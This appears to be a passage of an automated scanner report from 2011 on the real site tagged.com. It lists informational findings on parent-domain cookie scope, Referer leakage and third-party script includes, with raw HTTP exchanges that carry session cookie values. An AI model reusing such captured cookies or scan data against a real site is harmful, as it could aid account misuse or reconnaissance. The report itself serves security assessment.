The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /safety.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16421

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Safety, Security, and Privacy Overview</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<
...[SNIP]...

4.8. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms_of_service.html? HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 68504

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet"
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /help.html?topic=report-abuse HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11083

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/R/sQVrW_EFO.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div>

<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/l/IiYZruSDU.css"></link>
...[SNIP]...
<div class="right_block">
<img alt="Tagged" src="http://x.tagstat.com/im/headers/default/tagged_logo_black_blue_bk.gif" />
<p class="align_center">
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/S/JKkMB62Sf.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/7/QJTS6u5M8.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/B/rBvDAxhFG.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/0/yXslsH7g-.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/o/shJhH1t1H.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/A/xZEYeCZd0.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="//pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/help.html&c5=&c6=&c15=d1e8597e8b1fc6963ee38ea700732afac2a2e8da&cj=1" />
</noscript>
...[SNIP]...

5.2. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /terms_of_service.html? HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 68504

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/R/sQVrW_EFO.css"></link>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/R/K8e_MEvCG.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div>

<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/l/IiYZruSDU.css"></link>
...[SNIP]...
<div class="right_block">
<img alt="Tagged" src="http://x.tagstat.com/im/headers/default/tagged_logo_black_blue_bk.gif" />
<p class="align_center">
...[SNIP]...
<p>For more information about COPPA, please visit the <a
href="http://www.ftc.gov/">
Federal Trade Commission's web site</a>
...[SNIP]...
o, nor control over, advertisers' cookies or how they may be
used. If you would like more information about advertisers' use of cookies,
and about your option not to accept these cookies, please click
<a href="http://www.networkadvertising.org/managing/opt_out.asp">here</a>
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/4/u3cAot00_.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/7/QJTS6u5M8.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/B/rBvDAxhFG.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/D/j65ssQYsf.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/o/shJhH1t1H.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/A/xZEYeCZd0.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="//pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/terms_of_service.html&c5=&c6=&c15=d1e8597e8b1fc6963ee38ea700732afac2a2e8da&cj=1" />
</noscript>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 8 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.tagged.com/account_canceled.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_canceled.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account_canceled.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/realtime_iframe.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11067

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Canceled</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet"
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/0/yXslsH7g-.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.2. http://www.tagged.com/browse.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /browse.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 22147

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Browse</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/fed72dCgx.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.3. http://www.tagged.com/find_groups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /find_groups.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /find_groups.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 85379

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Find Groups</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type=
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/4/u3cAot00_.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/4/iuj-FfLPQ.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/a/z1jdpvQPM.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.4. http://www.tagged.com/forgot_password.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /forgot_password.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /forgot_password.html HTTP/1.1
Host: www.tagged.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Cookie: __utmz=50703532.1310644622.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=50703532.1263323370.1305485630.1305485630.1310644622.2; S=jj0c352loqhjhbqn845b9fd986; B=b=20554EA40C2AE455; __qca=P0-1786245134-1310644618467; scorecardresearch=640548315-1958170528-1310644620670; __utmb=50703532.0.10.1310644622; __utmc=50703532
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

email=xss&resend=0&submit_btn=Submit

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:57:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11640

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Forgot Password</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" t
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/V/VAo2iAj9a.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
